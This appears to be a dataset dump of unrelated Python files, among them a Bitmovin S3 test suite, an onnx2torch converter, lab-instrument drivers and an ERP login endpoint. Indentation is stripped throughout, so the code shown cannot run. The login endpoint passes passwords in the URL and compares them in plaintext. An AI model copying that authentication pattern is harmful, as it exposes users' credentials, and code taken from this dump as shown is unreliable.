content
stringlengths 5
1.05M
|
---|
from ApiObject import *
class connect(ApiObject):
def __init__(self):
super(connect, self).__init__()
self.uri = self.uri + "/<username>/<password>"
def get(self, **url_params):
return super(connect, self).get()
def on_get(self, **url_params):
content = self.db_service.get_content_where("accounts", "erp", "name", url_params['username'])
id = content[0]
name = content[1]
pwd = content[2]
creationdate = content[3]
if name == url_params['username'] and pwd == url_params['password']:
return "authorized"
else:
return "unauthorized" |
import unittest
import json
from bitmovin import Bitmovin, Response, S3Input
from bitmovin.errors import BitmovinApiError
from tests.bitmovin import BitmovinTestCase
class S3InputTests(BitmovinTestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
@classmethod
def tearDownClass(cls):
super().tearDownClass()
def setUp(self):
super().setUp()
self.bitmovin = Bitmovin(self.api_key)
self.assertIsNotNone(self.bitmovin)
self.assertTrue(isinstance(self.bitmovin, Bitmovin))
def tearDown(self):
super().tearDown()
def test_create_s3_input(self):
(sample_input, sample_files) = self._get_sample_s3_input()
input_resource_response = self.bitmovin.inputs.S3.create(sample_input)
self.assertIsNotNone(input_resource_response)
self.assertIsNotNone(input_resource_response.resource)
self.assertIsNotNone(input_resource_response.resource.id)
self._compare_s3_inputs(sample_input, input_resource_response.resource)
def test_create_s3_input_without_name(self):
(sample_input, sample_files) = self._get_sample_s3_input()
sample_input.name = None
input_resource_response = self.bitmovin.inputs.S3.create(sample_input)
self.assertIsNotNone(input_resource_response)
self.assertIsNotNone(input_resource_response.resource)
self.assertIsNotNone(input_resource_response.resource.id)
self._compare_s3_inputs(sample_input, input_resource_response.resource)
def test_retrieve_s3_input(self):
(sample_input, sample_files) = self._get_sample_s3_input()
created_input_response = self.bitmovin.inputs.S3.create(sample_input)
self.assertIsNotNone(created_input_response)
self.assertIsNotNone(created_input_response.resource)
self.assertIsNotNone(created_input_response.resource.id)
self._compare_s3_inputs(sample_input, created_input_response.resource)
retrieved_input_response = self.bitmovin.inputs.S3.retrieve(created_input_response.resource.id)
self.assertIsNotNone(retrieved_input_response)
self.assertIsNotNone(retrieved_input_response.resource)
self._compare_s3_inputs(created_input_response.resource, retrieved_input_response.resource)
def test_delete_s3_input(self):
(sample_input, sample_files) = self._get_sample_s3_input()
created_input_response = self.bitmovin.inputs.S3.create(sample_input)
self.assertIsNotNone(created_input_response)
self.assertIsNotNone(created_input_response.resource)
self.assertIsNotNone(created_input_response.resource.id)
self._compare_s3_inputs(sample_input, created_input_response.resource)
deleted_minimal_resource = self.bitmovin.inputs.S3.delete(created_input_response.resource.id)
self.assertIsNotNone(deleted_minimal_resource)
self.assertIsNotNone(deleted_minimal_resource.resource)
self.assertIsNotNone(deleted_minimal_resource.resource.id)
try:
self.bitmovin.inputs.S3.retrieve(created_input_response.resource.id)
self.fail(
'Previous statement should have thrown an exception. ' +
'Retrieving input after deleting it shouldn\'t be possible.'
)
except BitmovinApiError:
pass
def test_list_s3_inputs(self):
(sample_input, sample_files) = self._get_sample_s3_input()
created_input_response = self.bitmovin.inputs.S3.create(sample_input)
self.assertIsNotNone(created_input_response)
self.assertIsNotNone(created_input_response.resource)
self.assertIsNotNone(created_input_response.resource.id)
self._compare_s3_inputs(sample_input, created_input_response.resource)
inputs = self.bitmovin.inputs.S3.list()
self.assertIsNotNone(inputs)
self.assertIsNotNone(inputs.resource)
self.assertIsNotNone(inputs.response)
self.assertIsInstance(inputs.resource, list)
self.assertIsInstance(inputs.response, Response)
self.assertGreater(inputs.resource.__sizeof__(), 1)
def test_retrieve_s3_input_custom_data(self):
(sample_input, sample_files) = self._get_sample_s3_input()
sample_input.customData = '<pre>my custom data</pre>'
created_input_response = self.bitmovin.inputs.S3.create(sample_input)
self.assertIsNotNone(created_input_response)
self.assertIsNotNone(created_input_response.resource)
self.assertIsNotNone(created_input_response.resource.id)
self._compare_s3_inputs(sample_input, created_input_response.resource)
custom_data_response = self.bitmovin.inputs.S3.retrieve_custom_data(created_input_response.resource.id)
custom_data = custom_data_response.resource
self.assertEqual(sample_input.customData, json.loads(custom_data.customData))
def _compare_s3_inputs(self, first: S3Input, second: S3Input):
"""
:param first: S3Input
:param second: S3Input
:return: bool
"""
self.assertEqual(first.bucketName, second.bucketName)
self.assertEqual(first.cloudRegion, second.cloudRegion)
self.assertEqual(first.name, second.name)
self.assertEqual(first.description, second.description)
def _get_sample_s3_input(self):
s3_input_settings = self.settings.get('sampleObjects').get('inputs').get('s3')\
.get('9acae039-226b-46a3-8bae-706ae50b33c2')
files = s3_input_settings.get('files')
s3_input = S3Input(
access_key=s3_input_settings.get('accessKey'),
secret_key=s3_input_settings.get('secretKey'),
bucket_name=s3_input_settings.get('bucketName'),
cloud_region=s3_input_settings.get('cloudRegion'),
name='Sample S3 Input'
)
self.assertIsNotNone(s3_input.accessKey)
self.assertIsNotNone(s3_input.secretKey)
self.assertIsNotNone(s3_input.bucketName)
self.assertIsNotNone(s3_input.cloudRegion)
return s3_input, files
if __name__ == '__main__':
unittest.main()
|
from ipaserver.plugins.user import user
from ipalib import Bytes, _
user.takes_params += (
Bytes(
'jpegphoto?',
cli_name='avatar',
label=_("Avatar"),
doc=_("Base-64 encoded user picture (jpegphoto)"),
maxlength=100 * 1024, # max 100 kB
),
)
|
from Constant import PARAM_MAX_DELTAS, STATUS_CODES
def is_there_a_spike(sensor_reading, next_sensor_reading, max_delta):
if next_sensor_reading - sensor_reading > max_delta:
return True
return False
def detect_spike_in_sensor_stream(param_name, sensor_stream):
max_delta = PARAM_MAX_DELTAS[param_name]
for index, sensor_reading in enumerate(sensor_stream[:-1]):
next_sensor_reading = sensor_stream[index + 1]
if is_there_a_spike(sensor_reading, next_sensor_reading, max_delta):
return STATUS_CODES["500"]
return STATUS_CODES["200"]
def validate_sensor_stream(param_name, sensor_stream):
if sensor_stream is None:
return STATUS_CODES["400"]
if param_name not in PARAM_MAX_DELTAS:
return STATUS_CODES["404"]
return detect_spike_in_sensor_stream(param_name, sensor_stream)
|
"""qp is a library for manaing and converting between different representations of distributions"""
import os
from .version import __version__
from .spline_pdf import *
from .hist_pdf import *
from .interp_pdf import *
from .quant_pdf import *
from .mixmod_pdf import *
from .sparse_pdf import *
from .scipy_pdfs import *
from .ensemble import Ensemble
from .factory import instance, add_class, create, read, convert, concatenate
from . import utils
from . import test_funcs
|
__all__ = ['OnnxTranspose']
from typing import List
from typing import Optional
import torch
from torch import nn
from onnx2torch.node_converters.registry import add_converter
from onnx2torch.onnx_graph import OnnxGraph
from onnx2torch.onnx_node import OnnxNode
from onnx2torch.utils.common import OnnxMapping
from onnx2torch.utils.common import OnnxToTorchModule
from onnx2torch.utils.common import OperationConverterResult
class OnnxTranspose(nn.Module, OnnxToTorchModule):
def __init__(self, perm: Optional[List[int]] = None):
super().__init__()
self.perm = perm
def forward(self, input_tensor: torch.Tensor) -> torch.Tensor:
if self.perm is None:
self.perm = list(range(input_tensor.dim()))[::-1]
return input_tensor.permute(self.perm)
@add_converter(operation_type='Transpose', version=1)
@add_converter(operation_type='Transpose', version=13)
def _(node: OnnxNode, graph: OnnxGraph) -> OperationConverterResult: # pylint: disable=unused-argument
input_values = [node.input_values[0]]
perm_value_name = node.input_values[1] if len(node.input_values) > 1 else None
if perm_value_name is not None:
perm = graph.initializers[perm_value_name].to_torch().tolist()
else:
perm = node.attributes.get('perm', None)
if perm is not None:
perm = torch.tensor(perm, dtype=torch.long).tolist()
return OperationConverterResult(
torch_module=OnnxTranspose(perm=perm),
onnx_mapping=OnnxMapping(
inputs=tuple(input_values),
outputs=node.output_values,
),
)
|
import collections
from typing import List
from test_framework import generic_test
PairedTasks = collections.namedtuple('PairedTasks', ('task_1', 'task_2'))
def optimum_task_assignment(task_durations: List[int]) -> List[PairedTasks]:
# TODO - you fill in here.
return []
if __name__ == '__main__':
exit(
generic_test.generic_test_main('task_pairing.py', 'task_pairing.tsv',
optimum_task_assignment))
|
"""Cadence bin.
Author: Jose Vines
"""
import numpy as np
def cadence_bin(times, data, dt):
"""Bins timeseries data with cadence dt.
Parameters:
-----------
times : array_like
The times to bin in cadence dt.
data : array_like
Data corresponding to time times.
dt : float
Time cadence to bin into in minutes.
Returns:
--------
binned_times : array_like
The binned times
binned_data : array_like
The binned data corresponding to the median of all the original
data values inside a bin.
binned_errs : array_like
The binned errors calculated as the square root of the variance of
the data inside a given bin, divided by the square root of the
number of data points inside the bin.
"""
# First calculate the dt in JD
dt *= 60 / 86400
# Grab initial and final time in the timeseries
ti = times[0]
tf = times[-1]
# Calculate number of bins
n = int(np.ceil((tf - ti) / dt))
binned_times = np.zeros(n - 1)
binned_data = np.zeros(n - 1)
binned_errs = np.zeros(n - 1)
t = np.linspace(ti, tf, n)
for i in range(0, n - 1):
low = t[i] < times
up = times < t[i + 1]
bin_n = len(times[low * up])
if ~np.any(low * up):
continue
binned_times[i] = np.median(times[low * up])
binned_data[i] = np.median(data[low * up])
binned_errs[i] = np.sqrt(np.var(data[low * up]) / bin_n)
no_zeroes = binned_times != 0
no_nans = ~np.isnan(binned_data)
binned_times = binned_times[no_zeroes * no_nans]
binned_data = binned_data[no_zeroes * no_nans]
binned_errs = binned_errs[no_zeroes * no_nans]
return binned_times, binned_data, binned_errs
|
from ...core.utils.py3 import textstring
from ...core.devio import SCPI, backend #@UnresolvedImport
_depends_local=["...core.devio.SCPI"]
class LM500(SCPI.SCPIDevice):
"""
Cryomagnetics LM500/510 level monitor.
Channels are enumerated from 1.
To abort filling or reset a timeout, call :meth:`.SCPIDevice.reset` method.
Args:
conn: serial connection parameters (usually port or a tuple containing port and baudrate)
"""
def __init__(self, conn):
conn=backend.SerialDeviceBackend.combine_conn(conn,("COM1",9600))
SCPI.SCPIDevice.__init__(self,conn,backend="serial")
self.instr.term_read="\n"
self.instr.term_write="\n"
try:
self.write("ERROR 0")
self.write("REMOTE")
except self.instr.Error:
self.close()
self._add_settings_node("interval",self.get_interval,self.set_interval,ignore_error=(RuntimeError,))
self._add_status_node("level",self.get_level,mux=([1,2],))
self._add_status_node("fill_status",self.get_fill_status,mux=([1,2],))
self._add_settings_node("high_level",self.get_high_level,self.set_high_level,mux=([1,2],1))
self._add_settings_node("low_level",self.get_low_level,self.set_low_level,mux=([1,2],1))
def close(self):
"""Close connection to the device"""
try:
self.write("LOCAL")
finally:
SCPI.SCPIDevice.close(self)
_reset_comm="*RST;REMOTE"
def _instr_write(self, msg):
return self.instr.write(msg,read_echo=True,read_echo_delay=0.1)
def _instr_read(self, raw=False):
data=""
while not data:
data=self.instr.readline(remove_term=True).strip()
return data
def get_channel(self):
"""Get current measurement channel"""
return self.ask("CHAN?","int")
def set_channel(self, channel=1):
"""Set current measurement channel"""
self.write("CHAN",channel)
return self.get_channel()
def get_type(self, channel=1):
"""Get channel type (``"LHe"`` or ``"LN"``)"""
chan_type=self.ask("TYPE? {}".format(channel),"int")
return ["LHe","LN"][chan_type]
def _check_channel_LHe(self, op, channel=None):
if channel is None:
channel=self.get_channel()
if self.get_type(channel)=="LN":
raise RuntimeError("LN channel doesn't support {}".format(op))
def get_mode(self):
"""Get measurement mode at the current channel (``"S"`` for sample/hold, ``"C"`` for continuous)"""
self._check_channel_LHe("measurement modes")
return self.ask("MODE?").upper()
def set_mode(self, mode):
"""Set measurement mode at the current channel (``"S"`` for sample/hold, ``"C"`` for continuous)"""
self._check_channel_LHe("measurement modes")
self.write("MODE",mode)
return self.get_mode()
@staticmethod
def _str_to_sec(s):
s=s.strip().split(":")
s=[int(n.strip()) for n in s]
return s[0]*60**2+s[1]*60+s[2]
@staticmethod
def _sec_to_str(s):
return "{:02d}:{:02d}:{:02d}".format(int(s/60.**2),int((s/60.)%60.),int(s%60.))
def get_interval(self):
"""Get measurement interval in sample/hold mode (in seconds)"""
self._check_channel_LHe("measurement intervals")
return self._str_to_sec(self.ask("INTVL?"))
def set_interval(self, intvl):
"""Set measurement interval in sample/hold mode (in seconds)"""
self._check_channel_LHe("measurement intervals")
if not isinstance(intvl,textstring):
intvl=self._sec_to_str(intvl)
self.write("INTVL",intvl)
return self.get_interval()
def start_meas(self, channel=1):
"""Initialize measurement on a given channel"""
self.write("MEAS",channel)
def _get_stb(self):
return self.ask("*STB?","int")
def wait_meas(self, channel=1):
"""Wait for a measurement on a given channel to finish"""
mask=0x01 if channel==1 else 0x04
while not self._get_stb()&mask:
self.sleep(0.1)
def get_level(self, channel=1):
"""Get level reading on a given channel"""
res=self.ask("MEAS? {}".format(channel))
return float(res.split()[0])
def measure_level(self, channel=1):
"""Measure the level (initialize a measurement and return the result) on a given channel"""
self.start_meas(channel=channel)
self.wait_meas(channel=channel)
return self.get_level(channel=channel)
def start_fill(self, channel=1):
"""Initialize filling at a given channels"""
self.write("FILL",channel)
def get_fill_status(self, channel=1):
"""
Get filling status at a given channels.
Return either ``"off"`` (filling is off), ``"timeout"`` (filling timed out) or a float (time since filling started, in seconds)
"""
res=self.ask("FILL? {}".format(channel)).lower()
if res in {"off","timeout"}:
return res
spres=res.split()
if len(spres)==1 or spres[1] in ["m","min"]:
return float(spres[0])*60.
if spres[1] in ["s","sec"]:
return float(spres[0])
raise ValueError("unexpected response: {}".format(res))
def get_low_level(self, channel=1):
"""Get low level setting on a given channel"""
self.set_channel(channel)
return float(self.ask("LOW?").split()[0])
def set_low_level(self, level, channel=1):
"""Set low level setting on a given channel"""
self.set_channel(channel)
self.write("LOW",level)
def get_high_level(self, channel=1):
"""Get high level setting on a given channel"""
self.set_channel(channel)
return float(self.ask("HIGH?").split()[0])
def set_high_level(self, level, channel=1):
"""Set high level setting on a given channel"""
self.set_channel(channel)
self.write("HIGH",level) |
import functools
import logging
import numbers
import sys
import weakref
import warnings
from typing import List, Tuple, Set, Callable, Optional, Any, cast, Union, Dict, Mapping, NamedTuple, Iterable,\
Collection, Sequence
from collections import OrderedDict
import numpy as np
from qupulse import ChannelID
from qupulse._program._loop import Loop, make_compatible
from qupulse.hardware.feature_awg.channel_tuple_wrapper import ChannelTupleAdapter
from qupulse.hardware.feature_awg.features import ChannelSynchronization, AmplitudeOffsetHandling, VoltageRange, \
ProgramManagement, ActivatableChannels, DeviceControl, StatusTable, SCPI, VolatileParameters, \
ReadProgram, RepetitionMode
from qupulse.hardware.util import voltage_to_uint16, find_positions
from qupulse.utils.types import TimeType
from qupulse.hardware.feature_awg.base import AWGChannelTuple, AWGChannel, AWGDevice, AWGMarkerChannel
from qupulse._program.tabor import TaborSegment, TaborException, TaborProgram, PlottableProgram, TaborSequencing, \
make_combined_wave
import tabor_control.device
import pyvisa
assert (sys.byteorder == "little")
__all__ = ["TaborDevice", "TaborChannelTuple", "TaborChannel"]
TaborProgramMemory = NamedTuple("TaborProgramMemory", [("waveform_to_segment", np.ndarray),
("program", TaborProgram)])
def with_configuration_guard(function_object: Callable[["TaborChannelTuple", Any], Any]) -> Callable[
["TaborChannelTuple"], Any]:
"""This decorator assures that the AWG is in configuration mode while the decorated method runs."""
@functools.wraps(function_object)
def guarding_method(channel_pair: "TaborChannelTuple", *args, **kwargs) -> Any:
if channel_pair._configuration_guard_count == 0:
channel_pair._enter_config_mode()
channel_pair._configuration_guard_count += 1
try:
return function_object(channel_pair, *args, **kwargs)
finally:
channel_pair._configuration_guard_count -= 1
if channel_pair._configuration_guard_count == 0:
channel_pair._exit_config_mode()
return guarding_method
def with_select(function_object: Callable[["TaborChannelTuple", Any], Any]) -> Callable[["TaborChannelTuple"], Any]:
"""Asserts the channel pair is selcted when the wrapped function is called"""
@functools.wraps(function_object)
def selector(channel_tuple: "TaborChannelTuple", *args, **kwargs) -> Any:
channel_tuple._select()
return function_object(channel_tuple, *args, **kwargs)
return selector
########################################################################################################################
# Device
########################################################################################################################
# Features
class TaborSCPI(SCPI):
def __init__(self, device: "TaborDevice", visa: pyvisa.resources.MessageBasedResource):
super().__init__(visa)
self._parent = weakref.ref(device)
def send_cmd(self, cmd_str, paranoia_level=None):
for instr in self._parent().all_devices:
instr.send_cmd(cmd_str=cmd_str, paranoia_level=paranoia_level)
def send_query(self, query_str, query_mirrors=False) -> Any:
if query_mirrors:
return tuple(instr.send_query(query_str) for instr in self._parent().all_devices)
else:
return self._parent().main_instrument.send_query(query_str)
def _send_cmd(self, cmd_str, paranoia_level=None) -> Any:
"""Overwrite send_cmd for paranoia_level > 3"""
if paranoia_level is None:
paranoia_level = self._parent().paranoia_level
if paranoia_level < 3:
self._parent().super().send_cmd(cmd_str=cmd_str, paranoia_level=paranoia_level) # pragma: no cover
else:
cmd_str = cmd_str.rstrip()
if len(cmd_str) > 0:
ask_str = cmd_str + "; *OPC?; :SYST:ERR?"
else:
ask_str = "*OPC?; :SYST:ERR?"
*answers, opc, error_code_msg = self._parent()._visa_inst.ask(ask_str).split(";")
error_code, error_msg = error_code_msg.split(",")
error_code = int(error_code)
if error_code != 0:
_ = self._parent()._visa_inst.ask("*CLS; *OPC?")
if error_code == -450:
# query queue overflow
self.send_cmd(cmd_str)
else:
raise RuntimeError("Cannot execute command: {}\n{}: {}".format(cmd_str, error_code, error_msg))
assert len(answers) == 0
class TaborChannelSynchronization(ChannelSynchronization):
"""This Feature is used to synchronise a certain ammount of channels"""
def __init__(self, device: "TaborDevice"):
super().__init__()
self._parent = weakref.ref(device)
def synchronize_channels(self, group_size: int) -> None:
"""
Synchronize in groups of `group_size` channels. Groups of synchronized channels will be provided as
AWGChannelTuples. The channel_size must be evenly dividable by the number of channels
Args:
group_size: Number of channels per channel tuple
"""
if group_size == 2:
self._parent()._channel_tuples = []
for i in range((int)(len(self._parent().channels) / group_size)):
self._parent()._channel_tuples.append(
TaborChannelTuple((i + 1),
self._parent(),
self._parent().channels[(i * group_size):((i * group_size) + group_size)],
self._parent().marker_channels[(i * group_size):((i * group_size) + group_size)])
)
self._parent()[SCPI].send_cmd(":INST:COUP:STAT OFF")
elif group_size == 4:
self._parent()._channel_tuples = [TaborChannelTuple(1,
self._parent(),
self._parent().channels,
self._parent().marker_channels)]
self._parent()[SCPI].send_cmd(":INST:COUP:STAT ON")
else:
raise TaborException("Invalid group size")
class TaborDeviceControl(DeviceControl):
"""This feature is used for basic communication with a AWG"""
def __init__(self, device: "TaborDevice"):
super().__init__()
self._parent = weakref.ref(device)
def reset(self) -> None:
"""
Resetting the whole device. A command for resetting is send to the Device, the device is initialized again and
all channel tuples are cleared.
"""
self._parent()[SCPI].send_cmd(":RES")
self._parent()._coupled = None
self._parent()._initialize()
for channel_tuple in self._parent().channel_tuples:
channel_tuple[TaborProgramManagement].clear()
def trigger(self) -> None:
"""
This method triggers a device remotely.
"""
self._parent()[SCPI].send_cmd(":TRIG")
class TaborStatusTable(StatusTable):
def __init__(self, device: "TaborDevice"):
super().__init__()
self._parent = device
def get_status_table(self) -> Dict[str, Union[str, float, int]]:
"""
Send a lot of queries to the AWG about its settings. A good way to visualize is using pandas.DataFrame
Returns:
An ordered dictionary with the results
"""
name_query_type_list = [("channel", ":INST:SEL?", int),
("coupling", ":OUTP:COUP?", str),
("volt_dc", ":SOUR:VOLT:LEV:AMPL:DC?", float),
("volt_hv", ":VOLT:HV?", float),
("offset", ":VOLT:OFFS?", float),
("outp", ":OUTP?", str),
("mode", ":SOUR:FUNC:MODE?", str),
("shape", ":SOUR:FUNC:SHAPE?", str),
("dc_offset", ":SOUR:DC?", float),
("freq_rast", ":FREQ:RAST?", float),
("gated", ":INIT:GATE?", str),
("continuous", ":INIT:CONT?", str),
("continuous_enable", ":INIT:CONT:ENAB?", str),
("continuous_source", ":INIT:CONT:ENAB:SOUR?", str),
("marker_source", ":SOUR:MARK:SOUR?", str),
("seq_jump_event", ":SOUR:SEQ:JUMP:EVEN?", str),
("seq_adv_mode", ":SOUR:SEQ:ADV?", str),
("aseq_adv_mode", ":SOUR:ASEQ:ADV?", str),
("marker", ":SOUR:MARK:SEL?", int),
("marker_high", ":MARK:VOLT:HIGH?", str),
("marker_low", ":MARK:VOLT:LOW?", str),
("marker_width", ":MARK:WIDT?", int),
("marker_state", ":MARK:STAT?", str)]
data = OrderedDict((name, []) for name, *_ in name_query_type_list)
for ch in (1, 2, 3, 4):
self._parent.channels[ch - 1]._select()
self._parent.marker_channels[(ch - 1) % 2]._select()
for name, query, dtype in name_query_type_list:
data[name].append(dtype(self._parent[SCPI].send_query(query)))
return data
# Implementation
class TaborDevice(AWGDevice):
def __init__(self, device_name: str, instr_addr=None, paranoia_level=1, external_trigger=False, reset=False,
mirror_addresses=()):
"""
Constructor for a Tabor device
Args:
device_name (str): Name of the device
instr_addr: Instrument address that is forwarded to tabor_control
paranoia_level (int): Paranoia level that is forwarded to tabor_control
external_trigger (bool): Not supported yet
reset (bool):
mirror_addresses: list of devices on which the same things as on the main device are done.
For example you can a simulator and a real Device at once
"""
super().__init__(device_name)
self._instr = tabor_control.device.TEWXAwg(tabor_control.open_session(instr_addr), paranoia_level)
self._mirrors = tuple(tabor_control.device.TEWXAwg(tabor_control.open_session(address), paranoia_level)
for address in mirror_addresses)
self._coupled = None
self._clock_marker = [0, 0, 0, 0]
self.add_feature(TaborSCPI(self, self.main_instrument._visa_inst))
self.add_feature(TaborDeviceControl(self))
self.add_feature(TaborStatusTable(self))
if reset:
self[SCPI].send_cmd(":RES")
# Channel
self._channels = [TaborChannel(i + 1, self) for i in range(4)]
# MarkerChannels
self._marker_channels = [TaborMarkerChannel(i + 1, self) for i in range(4)]
self._initialize()
# ChannelTuple
self._channel_tuples = []
self.add_feature(TaborChannelSynchronization(self))
self[TaborChannelSynchronization].synchronize_channels(2)
if external_trigger:
raise NotImplementedError() # pragma: no cover
def enable(self) -> None:
"""
This method immediately generates the selected output waveform, if the device is in continuous and armed
repetition mode.
"""
self[SCPI].send_cmd(":ENAB")
def abort(self) -> None:
"""
With abort you can terminate the current generation of the output waveform. When the output waveform is
terminated the output starts generating an idle waveform.
"""
self[SCPI].send_cmd(":ABOR")
def set_coupled(self, coupled: bool) -> None:
"""
Thats the coupling of the device to 'coupled'
"""
if coupled:
self[SCPI].send_cmd("INST:COUP:STAT ON")
else:
self[SCPI].send_cmd("INST:COUP:STAT OFF")
def _is_coupled(self) -> bool:
"""
Returns true if the coupling of the device is 'coupled' otherwise false
"""
if self._coupled is None:
return self[SCPI].send_query(":INST:COUP:STAT?") == "ON"
else:
return self._coupled
def cleanup(self) -> None:
for channel_tuple in self.channel_tuples:
channel_tuple.cleanup()
@property
def channels(self) -> Collection["TaborChannel"]:
"""Returns a list of all channels of a Device"""
return self._channels
@property
def marker_channels(self) -> Collection["TaborMarkerChannel"]:
"""Returns a list of all marker channels of a device. The collection may be empty"""
return self._marker_channels
@property
def channel_tuples(self) -> Collection["TaborChannelTuple"]:
"""Returns a list of all channel tuples of a list"""
return self._channel_tuples
@property
def main_instrument(self) -> tabor_control.device.TEWXAwg:
return self._instr
@property
def mirrored_instruments(self) -> Sequence[tabor_control.device.TEWXAwg]:
return self._mirrors
@property
def all_devices(self) -> Sequence[tabor_control.device.TEWXAwg]:
return (self._instr,) + self._mirrors
@property
def _paranoia_level(self) -> tabor_control.ParanoiaLevel:
return self._instr.paranoia_level
@_paranoia_level.setter
def _paranoia_level(self, val):
for instr in self.all_devices:
instr.paranoia_level = val
@property
def dev_properties(self) -> dict:
return self._instr.dev_properties.as_dict()
def _send_binary_data(self, bin_dat, paranoia_level=None):
for instr in self.all_devices:
instr.write_segment_data(bin_dat, paranoia_level=paranoia_level)
def _download_segment_lengths(self, seg_len_list, paranoia_level=None):
for instr in self.all_devices:
instr.write_segment_lengths(seg_len_list, paranoia_level=paranoia_level)
def _download_sequencer_table(self, seq_table, paranoia_level=None):
for instr in self.all_devices:
instr.write_sequencer_table(seq_table, paranoia_level=paranoia_level)
def _download_adv_seq_table(self, seq_table, paranoia_level=None):
for instr in self.all_devices:
instr.write_advanced_sequencer_table(seq_table, paranoia_level=paranoia_level)
def _initialize(self) -> None:
# 1. Select channel
# 2. Turn off gated mode
# 3. Turn on continous mode
# 4. Armed mode (only generate waveforms after enab command)
# 5. Expect enable signal from (USB / LAN / GPIB)
# 6. Use arbitrary waveforms as marker source
# 7. Expect jump command for sequencing from (USB / LAN / GPIB)
setup_command = (
":INIT:GATE OFF; :INIT:CONT ON; "
":INIT:CONT:ENAB ARM; :INIT:CONT:ENAB:SOUR BUS;"
":SOUR:MARK:SOUR USER; :SOUR:SEQ:JUMP:EVEN BUS ")
self[SCPI].send_cmd(":INST:SEL 1")
self[SCPI].send_cmd(setup_command)
self[SCPI].send_cmd(":INST:SEL 3")
self[SCPI].send_cmd(setup_command)
def _get_readable_device(self, simulator=True) -> tabor_control.device.TEWXAwg:
"""
A method to get the first readable device out of all devices.
A readable device is a device which you can read data from like a simulator.
Returns:
The first readable device out of all devices
Throws:
TaborException: this exception is thrown if there is no readable device in the list of all devices
"""
for device in self.all_devices:
if device.supports_basic_reading():
if simulator:
if device.is_simulator:
return device
else:
return device
raise TaborException("No device capable of device data read")
########################################################################################################################
# Channel
########################################################################################################################
# Features
class TaborVoltageRange(VoltageRange):
def __init__(self, channel: "TaborChannel"):
super().__init__()
self._parent = weakref.ref(channel)
@property
@with_select
def offset(self) -> float:
"""Get offset of AWG channel"""
return float(
self._parent().device[SCPI].send_query(":VOLT:OFFS?".format(channel=self._parent().idn)))
@property
@with_select
def amplitude(self) -> float:
"""Get amplitude of AWG channel"""
coupling = self._parent().device[SCPI].send_query(":OUTP:COUP?")
if coupling == "DC":
return float(self._parent().device[SCPI].send_query(":VOLT?"))
elif coupling == "HV":
return float(self._parent().device[SCPI].send_query(":VOLT:HV?"))
else:
raise TaborException("Unknown coupling: {}".format(coupling))
@property
def amplitude_offset_handling(self) -> AmplitudeOffsetHandling:
"""
Gets the amplitude and offset handling of this channel. The amplitude-offset controls if the amplitude and
offset settings are constant or if these should be optimized by the driver
"""
return self._parent()._amplitude_offset_handling
@amplitude_offset_handling.setter
def amplitude_offset_handling(self, amp_offs_handling: Union[AmplitudeOffsetHandling, str]) -> None:
"""
amp_offs_handling: See possible values at `AWGAmplitudeOffsetHandling`
"""
amp_offs_handling = AmplitudeOffsetHandling(AmplitudeOffsetHandling)
self._parent()._amplitude_offset_handling = amp_offs_handling
def _select(self) -> None:
self._parent()._select()
class TaborActivatableChannels(ActivatableChannels):
def __init__(self, channel: "TaborChannel"):
super().__init__()
self._parent = weakref.ref(channel)
@property
def enabled(self) -> bool:
"""
Returns the the state a channel has at the moment. A channel is either activated or deactivated
True stands for activated and false for deactivated
"""
return self._parent().device[SCPI].send_query(":OUTP ?") == "ON"
@with_select
def enable(self):
"""Enables the output of a certain channel"""
command_string = ":OUTP ON".format(ch_id=self._parent().idn)
self._parent().device[SCPI].send_cmd(command_string)
@with_select
def disable(self):
"""Disables the output of a certain channel"""
command_string = ":OUTP OFF".format(ch_id=self._parent().idn)
self._parent().device[SCPI].send_cmd(command_string)
def _select(self) -> None:
self._parent()._select()
# Implementation
class TaborChannel(AWGChannel):
def __init__(self, idn: int, device: TaborDevice):
super().__init__(idn)
self._device = weakref.ref(device)
self._amplitude_offset_handling = AmplitudeOffsetHandling.IGNORE_OFFSET
# adding Features
self.add_feature(TaborVoltageRange(self))
self.add_feature(TaborActivatableChannels(self))
@property
def device(self) -> TaborDevice:
"""Returns the device that the channel belongs to"""
return self._device()
@property
def channel_tuple(self) -> "TaborChannelTuple":
"""Returns the channel tuple that this channel belongs to"""
return self._channel_tuple()
def _set_channel_tuple(self, channel_tuple: "TaborChannelTuple") -> None:
"""
The channel tuple "channel_tuple" is assigned to this channel
Args:
channel_tuple (TaborChannelTuple): the channel tuple that this channel belongs to
"""
self._channel_tuple = weakref.ref(channel_tuple)
def _select(self) -> None:
self.device[SCPI].send_cmd(":INST:SEL {channel}".format(channel=self.idn))
########################################################################################################################
# ChannelTuple
########################################################################################################################
# Features
class TaborProgramManagement(ProgramManagement):
def __init__(self, channel_tuple: "TaborChannelTuple"):
super().__init__(channel_tuple)
self._programs = {}
self._armed_program = None
self._idle_sequence_table = [(1, 1, 0), (1, 1, 0), (1, 1, 0)]
self._trigger_source = 'BUS'
def get_repetition_mode(self, program_name: str) -> str:
"""
Returns the default repetition mode of a certain program
Args:
program_name (str): name of the program whose repetition mode should be returned
"""
return self._channel_tuple._known_programs[program_name].program._repetition_mode
def set_repetition_mode(self, program_name: str, repetition_mode: str) -> None:
"""
Changes the default repetition mode of a certain program
Args:
program_name (str): name of the program whose repetition mode should be changed
Throws:
ValueError: this Exception is thrown when an invalid repetition mode is given
"""
if repetition_mode in ("infinite", "once"):
self._channel_tuple._known_programs[program_name].program._repetition_mode = repetition_mode
else:
raise ValueError("{} is no vaild repetition mode".format(repetition_mode))
@property
def supported_repetition_modes(self) -> Set[RepetitionMode]:
return {RepetitionMode.INFINITE}
@with_configuration_guard
@with_select
def upload(self, name: str,
program: Loop,
channels: Tuple[Optional[ChannelID], Optional[ChannelID]],
marker_channels: Tuple[Optional[ChannelID], Optional[ChannelID]],
voltage_transformation: Tuple[Callable, Callable],
repetition_mode: str = None,
force: bool = False) -> None:
"""
Upload a program to the AWG.
The policy is to prefer amending the unknown waveforms to overwriting old ones.
"""
if repetition_mode is None:
repetition_mode = self._default_repetition_mode
else:
repetition_mode = RepetitionMode(repetition_mode)
if repetition_mode not in self.supported_repetition_modes:
raise ValueError(f"{repetition_mode} is not supported on {self._channel_tuple}")
if len(channels) != len(self._channel_tuple.channels):
raise ValueError("Wrong number of channels")
if len(marker_channels) != len(self._channel_tuple.marker_channels):
raise ValueError("Wrong number of marker")
if len(voltage_transformation) != len(self._channel_tuple.channels):
raise ValueError("Wrong number of voltage transformations")
# adjust program to fit criteria
sample_rate = self._channel_tuple.device.channel_tuples[0].sample_rate
make_compatible(program,
minimal_waveform_length=192,
waveform_quantum=16,
sample_rate=sample_rate / 10 ** 9)
